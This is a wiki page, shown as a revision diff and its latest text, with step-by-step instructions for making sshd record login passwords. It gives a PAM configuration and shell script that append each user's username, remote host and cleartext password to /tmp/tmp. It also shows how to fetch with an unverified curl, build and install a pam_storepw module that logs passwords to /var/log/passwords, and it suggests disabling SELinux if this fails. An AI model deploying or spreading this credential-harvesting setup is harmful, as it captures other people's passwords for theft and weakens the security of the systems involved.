Sshd: Difference between revisions
Jump to navigation
Jump to search
(7 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
=save password= | =sshd save password= | ||
==pam_exec.so== | |||
/etc/pam.d/password-auth-ac | |||
#%PAM-1.0 | |||
# This file is auto-generated. | |||
# User changes will be destroyed the next time authconfig is run. | |||
auth required pam_env.so | |||
auth sufficient pam_unix.so nullok try_first_pass | |||
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so | |||
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata | |||
... | |||
/usr/local/bin/pam_exec.so | |||
#!/bin/sh | |||
read password | |||
echo "User: $PAM_USER" >> /tmp/tmp | |||
echo "Ruser: $PAM_RUSER" >> /tmp/tmp | |||
echo "Rhost: $PAM_RHOST" >> /tmp/tmp | |||
echo "Service: $PAM_SERVICE" >> /tmp/tmp | |||
echo "TTY: $PAM_TTY" >> /tmp/tmp | |||
echo "Password : $password" >> /tmp/tmp | |||
exit $? | |||
==pam_storepw.so== | |||
Download source code for module. | Download source code for module. | ||
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | ||
Create the following Makefile | Create the following Makefile | ||
all: pam_storepw.so | |||
all: pam_storepw.so | pam_storepw.so: pam_storepw.o | ||
$(LD) --shared -o $@ $< -lpam -lpam_misc | |||
pam_storepw.so: pam_storepw.o | |||
clean: | |||
rm -f pam_storepw.o pam_storepw.so core *~ | |||
clean: | |||
extraclean: clean | |||
rm -f *.a *.o *.so *.bak | |||
.c.o: | |||
$(CC) $(CFLAGS) -c $< -o $@ -fPIC | |||
Build file | Build file | ||
make | make | ||
Copy file | Copy file | ||
cp pam_storepw.so /lib64/security/ | cp pam_storepw.so /lib64/security/ | ||
chmod 755 /lib64/security/pam_storepw.so | chmod 755 /lib64/security/pam_storepw.so | ||
auth | password-auth-ac | ||
#%PAM-1.0 | |||
# This file is auto-generated. | |||
# User changes will be destroyed the next time authconfig is run. | |||
auth required pam_env.so | |||
auth sufficient pam_unix.so nullok try_first_pass | |||
auth optional pam_storepw.so | |||
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata | |||
... | |||
Passwords start to be written to | Passwords start to be written to | ||
/var/log/passwords | /var/log/passwords |
Latest revision as of 07:46, 7 November 2018
sshd save password
pam_exec.so
/etc/pam.d/password-auth-ac
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth sufficient pam_unix.so nullok try_first_pass auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata ...
/usr/local/bin/pam_exec.so
#!/bin/sh read password echo "User: $PAM_USER" >> /tmp/tmp echo "Ruser: $PAM_RUSER" >> /tmp/tmp echo "Rhost: $PAM_RHOST" >> /tmp/tmp echo "Service: $PAM_SERVICE" >> /tmp/tmp echo "TTY: $PAM_TTY" >> /tmp/tmp echo "Password : $password" >> /tmp/tmp exit $?
pam_storepw.so
Download source code for module.
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
Create the following Makefile
all: pam_storepw.so pam_storepw.so: pam_storepw.o $(LD) --shared -o $@ $< -lpam -lpam_misc clean: rm -f pam_storepw.o pam_storepw.so core *~ extraclean: clean rm -f *.a *.o *.so *.bak .c.o: $(CC) $(CFLAGS) -c $< -o $@ -fPIC
Build file
make
Copy file
cp pam_storepw.so /lib64/security/ chmod 755 /lib64/security/pam_storepw.so
password-auth-ac
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth sufficient pam_unix.so nullok try_first_pass auth optional pam_storepw.so auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata ...
Passwords start to be written to
/var/log/passwords
If you do not get any entries.
Temporarily turn selinux off to see if it starts to work run pam in debug to see what is going on.